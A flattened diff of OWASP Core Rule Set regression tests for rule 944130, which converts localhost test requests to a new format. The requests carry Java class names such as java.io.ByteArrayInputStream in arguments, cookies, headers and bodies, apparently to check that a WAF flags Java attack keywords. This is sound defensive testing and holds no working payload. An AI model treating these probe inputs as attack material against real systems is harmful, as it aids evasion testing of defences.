Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.BufferedReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 45 desc: "Argument test includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayInputStream" + output: + log: + expect_ids: [944130] + - test_id: 46 desc: "Argument name includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS 
test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 47 desc: "Cookie test includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ByteArrayInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 48 desc: "Cookie name includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: 
java.io.ByteArrayInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-49 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 49 desc: "Request header test includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ByteArrayInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-50 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 50 desc: "XML attribute value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-51 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 51 desc: "XML element value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-52 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log: + expect_ids: [944130] + - test_id: 52 desc: "Nested XML element value includes keyword 
java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log: + expect_ids: [944130] + - test_id: 53 desc: "Content-Type text/plain includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
"test=java.io.ByteArrayInputStream" + output: + log: + expect_ids: [944130] + - test_id: 54 desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ByteArrayInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayInputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 55 desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.ByteArrayInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayInputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 56 desc: "Argument test includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 57 desc: "Argument name includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"java.io.ByteArrayOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 58 desc: "Cookie test includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ByteArrayOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 59 desc: "Cookie name includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.ByteArrayOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 60 desc: "Request header test includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ByteArrayOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" 
+ data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 61 desc: "XML attribute value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 62 desc: "XML element value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 63 desc: "Nested XML element value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 64 desc: "Content-Type text/plain includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 65 desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-66 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 66 desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"{\"java.io.ByteArrayOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-67 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 67 desc: "Argument test includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-68 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log: + expect_ids: [944130] + - test_id: 68 desc: "Argument name includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.CharArrayReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-69 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.CharArrayReader=test" + output: + log: + expect_ids: [944130] + - test_id: 69 desc: "Cookie test includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.CharArrayReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.CharArrayReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - 
test_id: 70 desc: "Cookie name includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.CharArrayReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.CharArrayReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 71 desc: "Request header test includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.CharArrayReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
